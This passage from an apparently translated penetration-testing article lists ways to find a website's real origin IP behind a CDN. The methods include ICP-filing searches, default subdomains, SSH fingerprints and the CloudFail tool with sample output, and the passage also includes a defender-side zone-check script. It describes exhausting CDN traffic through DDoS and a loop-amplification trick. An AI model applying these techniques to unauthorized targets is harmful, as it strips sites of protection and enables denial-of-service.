Some websites use self-built CDN machines for load balancing. It is hard to guarantee that every CDN machine is 100% secure. If there is no other way, you can try penetrating these CDN machines; win one and you have everything. The safety of the target's main site does not mean there are no defects anywhere along the production path. Security lies not in how strong the strongest point is, but in how weak the weakest point is.
21. Through traffic exhaustion and traffic amplification attacks
CDN is a paid service, so its traffic is necessarily limited. When testing targets that are not super-large websites, note that, with the permission of the project owner, you can test DDoS traffic.
Once the CDN's traffic quota is exhausted, no content is distributed and you can obtain the source IP address directly.
However, CDN traffic passes through to the origin, so the target website is already down before the quota is exhausted.
Another old trick abused defects in CDN settings: set the protected origin site's IP address to the address of a CDN node, so that CDN traffic enters a loop, is amplified layer by layer, and the CDN finally takes itself down. However, most CDN vendors already forbid setting a CDN node IP as the origin and have enabled automatic packet-loss protection.
22. Wide-area detection through domain name ICP filing information
If the target domain name and its second-level domain names all have CDN enabled, is the line of thinking cut off?
Definitely not. Here is a unique trick that few people pay attention to.
Websites need servers, but it is impossible for a local company to dedicate one server to each domain name. In most cases, several domain-name businesses share one server.
If the target website has an ICP filing, you can query the filing information, collect the other website domain names and subdomains filed by the same enterprise or individual, and then run a round of wide-area detection. It is very likely that the real server's IP address is directly exposed on one of the edge subdomains without CDN; then verify further whether that IP address is also the real IP address of the target website.


This method has an extremely high success rate and is very fast, so readers who have persevered this far are rewarded for it.
23. Use the default configuration of CDN service providers
Different CDN service providers ship different default product configurations.
For example, with CloudFlare the direct.domain.com subdomain is configured by default to point to the server's source IP address. Many companies or individuals do not change the default configuration when enabling CDN protection, which leads to the risk of IP leakage.
Other high-risk subdomains such as ftp, mail, cpanel, and direct-connect can also be checked first for fast positioning. After all, time is money in crowdsourced testing.
24. Fingerprint through SSH
Off topic: SSH fingerprints are generally used to track anonymous Tor network services.
25. Use the CloudFail tool
If your target is protected by CloudFlare, it is recommended to use this tool first.
CloudFail is a tactical reconnaissance tool designed to collect enough information about a Cloudflare-protected target to discover the server's IP address.
The tool runs three different phases:
1. Use DNSDumpster.com to scan for DNS misconfigurations.
2. Scan and compare against the Crimeflare.com database.
3. Scan more than 11000 subdomains with the built-in dictionary.
Installation and use:

$git clone https://github.com/m0rtem/CloudFail
$pip install -r requirements.txt
$python cloudfail.py -t domain.com
v1.0.2 by m0rtem
[16:12:31] Initializing CloudFail - the date is: 07/01/2021
[16:12:31] Fetching initial information from: domain.com...
[16:12:31] Server IP: 104.xx.x.76
[16:12:31] Testing if domain.com is on the Cloudflare network...
[16:12:31] domain.com is part of the Cloudflare network!
[16:12:31] Testing for misconfigured DNS using dnsdumpster...
[16:12:35] [FOUND:HOST] domain.com HTTP: cloudflare TCP8080: cloudflare 172.xx.xx.62 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:HOST] freelance.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:HOST] www.freelance.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:HOST] ctf.domain.com HTTP: nginx/1.10.3 HTTPS: nginx/1.10.3 SSH: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7 185.231.245.55 TEAM-HOST AS Russia
[16:12:35] [FOUND:HOST] www.ctf.domain.com HTTP: nginx/1.10.3 HTTPS: nginx/1.10.3 SSH: SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u7 185.231.245.55 TEAM-HOST AS Russia
[16:12:35] [FOUND:HOST] mail.domain.com 62.213.11.246 ROSTELECOM-ASRussia Russia
[16:12:35] [FOUND:HOST] school.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:HOST] www.school.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:HOST] pentest.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:HOST] www.pentest.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:HOST] w.domain.com HTTP: nginx/1.6.2 HTTPS: nginx/1.6.2 SSH: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8 185.xx.xx.136 TEAM-HOST AS Russia
[16:12:35] [FOUND:HOST] www.w.domain.com HTTP: nginx/1.6.2 HTTPS: nginx/1.6.2 SSH: SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u8 185.xx.xx.136 TEAM-HOST AS Russia
[16:12:35] [FOUND:HOST] www.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:HOST] pay.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:HOST] www.pay.domain.com HTTP: cloudflare TCP8080: cloudflare 104.xx.xx.76 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:DNS] tim.ns.cloudflare.com. 173.xx.xx.145 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:DNS] tina.ns.cloudflare.com. 173.xx.xx.230 CLOUDFLARENETUnited States United States
[16:12:35] [FOUND:MX] 62.xx.xx.246 ROSTELECOM-ASRussia 10 mail.domain.com.
[16:12:35] [FOUND:MX] 62.xx.xx.246 ROSTELECOM-ASRussia 20 mail.domain.com.
[16:12:35] Scanning crimeflare database...
[16:12:36] [FOUND:IP] 62.xx.xx.230
[16:12:36] [FOUND:IP] 62.xx.xx.246
[16:12:36] Scanning 11219 subdomains (subdomains.txt), please wait...
[16:15:52] [FOUND:SUBDOMAIN] mail.domain.com IP: 62.xx.xx.246 HTTP: 200
[16:16:13] [FOUND:SUBDOMAIN] pay.domain.com ON CLOUDFLARE NETWORK!
[16:16:35] [FOUND:SUBDOMAIN] school.domain.com ON CLOUDFLARE NETWORK!
[16:17:03] [FOUND:SUBDOMAIN] w.domain.com IP: 185.xx.xx.136 HTTP: 200
[16:17:10] [FOUND:SUBDOMAIN] www.domain.com ON CLOUDFLARE NETWORK!
[16:17:14] Scanning finished...
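A defender-side check in the same spirit as the CloudFail output above, added here as an example and not part of the original article or of CloudFail: given the zone's own DNS records and the CDN provider's published prefixes, it lists every hostname whose address lies outside the CDN, which is exactly what the default direct, mail and ftp records of section 23 tend to leak, and groups exposed hosts that share one address as in section 22. The prefixes and zone records below are constructed samples (documentation ranges, not real data).

```python
import ipaddress
from typing import Dict, Iterable, List, Tuple

# Constructed sample: prefixes a CDN provider publishes for its edge network (placeholders, not a real list).
CDN_PREFIXES = ["104.16.0.0/13", "172.64.0.0/13"]

# Constructed sample zone in the shape of the CloudFail output: hostname -> A records.
# Non-CDN addresses come from the documentation ranges 198.51.100.0/24 and 203.0.113.0/24.
ZONE_RECORDS: Dict[str, List[str]] = {
    "www.domain.com": ["104.20.1.76"],
    "pay.domain.com": ["104.20.1.76"],
    "direct.domain.com": ["203.0.113.10"],             # default origin alias never removed
    "mail.domain.com": ["203.0.113.10"],               # MX host on the same box as the origin
    "ctf.domain.com": ["198.51.100.55"],
    "w.domain.com": ["198.51.100.55", "104.20.1.76"],  # partly behind the CDN, partly exposed
}

def build_networks(prefixes: Iterable[str]) -> List[ipaddress.IPv4Network]:
    return [ipaddress.ip_network(p, strict=False) for p in prefixes]

def is_behind_cdn(ip: str, networks: List[ipaddress.IPv4Network]) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in networks)

def find_leaking_records(zone: Dict[str, List[str]], prefixes: Iterable[str]) -> List[Tuple[str, str]]:
    """(hostname, ip) pairs whose address is outside every CDN prefix, i.e. records that
    bypass the CDN and hand out an origin or other direct address."""
    networks = build_networks(prefixes)
    return [(host, ip) for host, ips in sorted(zone.items()) for ip in ips
            if not is_behind_cdn(ip, networks)]

def shared_origin_candidates(leaks: List[Tuple[str, str]]) -> Dict[str, List[str]]:
    """Group exposed hosts by address.  One address answering for several names is the
    'many domains on one server' situation of section 22, so review those records first."""
    by_ip: Dict[str, List[str]] = {}
    for host, ip in leaks:
        by_ip.setdefault(ip, []).append(host)
    return by_ip

if __name__ == "__main__":
    leaks = find_leaking_records(ZONE_RECORDS, CDN_PREFIXES)
    for host, ip in leaks:
        print(f"EXPOSED  {host:<22} {ip}")
    for ip, hosts in shared_origin_candidates(leaks).items():
        print(f"SHARED   {ip:<16} {', '.join(hosts)}")
```

Feed it an export of your real zone and the provider's current prefix list; any EXPOSED line is a record to move behind the CDN, firewall to CDN addresses only, or delete.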

Close your eyes and rest for a while, and the results will come out:


If you prefer to be lazy, you can use the online query at https://suip.biz/?act=cloudfail . The tool has been integrated into the backend there, and a front-end UI page has been made so that security practitioners can query online:



The script's result can be seen directly in the front end, and a PDF report download is provided. Here I use baidu.com for testing; because baidu.com does not use CloudFlare CDN, the result comes back very fast.
If you query a domain name that does use CloudFlare CDN, it is slow: the page stays empty and nothing is displayed:


Just wait for a while, here is also a screenshot for everyone, in case of misunderstanding that the tool cannot be used:


 
0x04 How to use the real IP address
You can modify the hosts file to bind the domain name to the IP address. (If you do not know how, this article is not for you.)
If you test with Burp Suite, you can add the domain name and IP address record under Project options --> Connections --> Hostname Resolution.


 
0x05 Confrontation from a higher dimension
Protocol layer control / dynamic and static tables / egress blocking / concurrency mechanism conversion / coding amplification... The higher-dimensional confrontation content will be detailed in part (2). (To be continued)

The content of this article comes from material collected on the web by netizens. It is for learning reference only; the copyright belongs to the original author.